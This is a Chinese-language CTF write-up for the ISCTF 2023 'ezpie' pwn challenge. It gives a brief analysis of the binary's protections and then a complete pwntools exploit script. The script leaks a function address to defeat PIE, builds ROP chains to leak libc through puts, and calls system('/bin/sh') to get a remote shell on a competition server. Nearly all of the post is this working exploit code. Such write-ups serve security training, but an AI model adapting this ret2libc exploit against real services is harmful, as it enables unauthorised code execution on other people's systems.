isctf2023 - ezpie

RocketDev

文件分析

NX on, PIE on, Canary off, RELRO full
ghidra分析为64位程序

解题思路

栈上放上了func函数的地址,只要把buf填满就可以读到func的地址, 然后就打ret2libc就行

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *
import LibcSearcher

def payload(lo):
global sh
if lo:
sh = process('ezpie')
else:
sh = remote('43.249.195.138', 22188)
if lo & 0b10:
gdb.attach(sh)
elf = ELF('ezpie')

# payload 1, fill buf to read funcAddr
sh.sendline(b'0'*35 + b'FLAG')

sh.recvuntil(b'FLAG\n') # skip
funcAddr = u64(sh.recv(6) + b'\0\0')
pieBase = funcAddr - elf.symbols['func']
putsPlt = pieBase + elf.plt['puts']
putsGot = pieBase + elf.got['puts']
retAddr = pieBase + 0x1253
popRdiAddr = pieBase + 0x1333

# payload 2, leak libcBase
sh.sendline(b'0'*88 + p64(popRdiAddr) + p64(putsGot) + p64(putsPlt) + p64(funcAddr))

sh.recvuntil(b'you\n') # skip
putsLibc = u64(sh.recv(6) + b'\0\0')
libc = LibcSearcher.LibcSearcher('puts', putsLibc & 0xfff)
libcBase = putsLibc - libc.dump('puts')
systemAddr = libcBase + libc.dump('system')
shstrAddr = libcBase + libc.dump('str_bin_sh')

# payload 3, execute system
sh.sendline(b'0'*88 + p64(popRdiAddr) + p64(shstrAddr) + p64(retAddr) + p64(systemAddr))

sh.interactive()

Done.

  • 标题: isctf2023 - ezpie
  • 作者: RocketDev
  • 创建于 : 2023-12-01 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketma.dev/2023/12/01/ezpie/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
isctf2023 - ezpie